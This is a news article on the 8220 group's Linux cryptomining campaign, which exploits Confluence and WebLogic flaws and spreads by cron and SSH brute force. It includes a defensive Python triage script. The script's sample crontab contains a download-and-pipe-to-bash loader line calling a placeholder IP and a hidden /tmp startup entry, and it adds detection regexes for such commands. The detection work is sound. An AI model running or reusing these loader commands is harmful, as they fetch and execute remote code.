Microsoft Warns Against Cryptomining Malware Campaign Targeting Linux Servers


A cloud threat group tracked as 8220 has updated its malware toolset to breach Linux servers and install cryptominers as part of a long-running campaign.

“The updates include the deployment of new versions of a cryptominer and an IRC bot,” Microsoft Security Intelligence said in a series of tweets on Thursday. “The group has been actively updating its techniques and payloads over the past year.”

8220, active since early 2017, is a Chinese-speaking, Monero-mining threat actor, so named for its preference for communicating with command-and-control (C2) servers over port 8220. It is also the developer of a tool called whatMiner, which was co-opted by the Rocke cybercrime group in its attacks.

In July 2019, the Alibaba Cloud Security Team uncovered a further shift in the adversary’s tactics: the use of rootkits to hide the mining program. Two years later, the gang resurfaced with Tsunami IRC botnet variants and a custom “PwnRig” miner.

According to Microsoft, the latest campaign, which affects i686 and x86_64 Linux systems, has been observed exploiting remote code execution vulnerabilities in the recently disclosed Atlassian Confluence Server flaw (CVE-2022-26134) and in Oracle WebLogic (CVE-2019-2725) for initial access.

This step is followed by retrieving a malware loader from a remote server, which drops the PwnRig miner and an IRC bot, but not before taking steps to evade detection by clearing log files, disabling cloud monitoring agents and disabling security software.

“In addition to achieving persistence through a cron job, the loader uses the IP port scanner tool ‘masscan’ to find other SSH servers on the network, then uses the GoLang-based SSH brute force tool ‘spirit’ to propagate,” Microsoft said.
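The loader behaviours described above (cron persistence, SSH brute forcing of neighbouring hosts, and beaconing to port 8220) each leave traces a defender can look for on a Linux host. The following triage script is an added example written for this article, not Microsoft’s code or anything published by the group; the auth.log lines, crontab and socket list are constructed sample data, the brute-force threshold and window are arbitrary, and the connection tuples assume the `(process, remote_ip, remote_port)` shape shown rather than any particular tool’s output.

```python
import re
from datetime import datetime, timedelta

# Constructed sample data (not captured from a real incident).
AUTH_LOG = """\
Jun 30 10:00:01 web1 sshd[2001]: Failed password for root from 10.0.0.5 port 51000 ssh2
Jun 30 10:00:03 web1 sshd[2002]: Failed password for root from 10.0.0.5 port 51002 ssh2
Jun 30 10:00:05 web1 sshd[2003]: Failed password for invalid user admin from 10.0.0.5 port 51004 ssh2
Jun 30 10:00:08 web1 sshd[2004]: Failed password for root from 10.0.0.5 port 51006 ssh2
Jun 30 10:00:11 web1 sshd[2005]: Failed password for root from 10.0.0.5 port 51008 ssh2
Jun 30 10:00:14 web1 sshd[2006]: Accepted password for root from 10.0.0.5 port 51010 ssh2
Jun 30 10:05:00 web1 sshd[2007]: Failed password for alice from 192.168.1.20 port 40000 ssh2
Jun 30 10:40:00 web1 sshd[2008]: Failed password for alice from 192.168.1.20 port 40001 ssh2
"""

CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * (curl -fsSL http://198.51.100.23/x || wget -q -O- http://198.51.100.23/x) | bash >/dev/null 2>&1
@reboot /tmp/.X11-unix/.rsync/c/run
"""

# Established sockets as (process, remote address, remote port); hypothetical shape, constructed values.
CONNECTIONS = [
    ("nginx", "198.51.100.4", 443),
    ("run", "203.0.113.9", 8220),
    ("sshd", "192.168.1.20", 40001),
]

_FAIL = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
                   r"Failed password for (?:invalid user )?\S+ from (\S+) port")
_ACCEPT = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
                     r"Accepted \w+ for (\S+) from (\S+) port")


def _ts(s):
    # syslog timestamps carry no year; any fixed year is fine for differences within one log
    return datetime.strptime(s, "%b %d %H:%M:%S")


def ssh_bruteforce_sources(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {source_ip: peak_failures} for sources with >= threshold failed logins
    inside any span of length `window` (sliding window, so slow attempts are not flagged)."""
    per_src = {}
    for line in log_text.splitlines():
        m = _FAIL.match(line)
        if m:
            per_src.setdefault(m.group(2), []).append(_ts(m.group(1)))
    flagged = {}
    for src, times in per_src.items():
        times.sort()
        lo, peak = 0, 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            flagged[src] = peak
    return flagged


def accepted_from_bruteforce_sources(log_text, **kw):
    """(user, source_ip) for successful logins from sources flagged as brute forcing."""
    sources = ssh_bruteforce_sources(log_text, **kw)
    return [(m.group(2), m.group(3)) for m in map(_ACCEPT.match, log_text.splitlines())
            if m and m.group(3) in sources]


# Crontab patterns typical of download-and-execute loaders (heuristics, not signatures).
_CRON_RULES = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b"), "downloads a script and pipes it to a shell"),
    (re.compile(r"(^|\s|\()(/tmp|/dev/shm|/var/tmp)/"), "runs a binary from a world-writable directory"),
    (re.compile(r"base64\s+(-d|--decode)"), "decodes an embedded payload"),
]


def suspicious_cron_entries(crontab_text):
    """Return (entry, reason) for crontab lines matching loader-style persistence."""
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        for rule, reason in _CRON_RULES:
            if rule.search(line):
                hits.append((line, reason))
                break
    return hits


def c2_candidates(conns, ports=(8220,)):
    """Established sockets to the port the group is named for."""
    return [c for c in conns if c[2] in ports]


if __name__ == "__main__":
    print("brute-force sources:", ssh_bruteforce_sources(AUTH_LOG))
    print("logins from those sources:", accepted_from_bruteforce_sources(AUTH_LOG))
    for entry, reason in suspicious_cron_entries(CRONTAB):
        print("cron:", reason, "->", entry)
    print("port-8220 sockets:", c2_candidates(CONNECTIONS))
```

On a real host, feed `/var/log/auth.log` (or `journalctl -u ssh`), the output of `crontab -l` for root and every service account plus `/etc/cron*`, and the established-socket list from `ss -tnp`. Because the loader clears logs before dropping its payloads, an empty or truncated auth.log is itself a finding; the cron and socket checks still work after the logs are gone.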

The findings come as Akamai revealed that the Atlassian Confluence flaw is seeing a steady 20,000 exploit attempts a day, launched from approximately 6,000 IPs, down from a peak of 100,000 in the immediate aftermath of the bug’s disclosure on June 2, 2022. About 67% of the attacks originate from the US.

“Trade accounts for 38% of attack activity, followed by high-tech and financial services, respectively,” Akamai’s Chen Doytshman said this week. “These top three verticals make up more than 75% of the business.”

The attacks range from vulnerability probes, to determine whether the target system is susceptible, to the injection of malware such as web shells and cryptominers, the cloud security company noted.

“What is especially concerning is how much of an upward shift this type of attack has amassed in recent weeks,” Doytshman added. “As we’ve seen with similar vulnerabilities, CVE-2022-26134 will likely continue to be exploited for years to come.”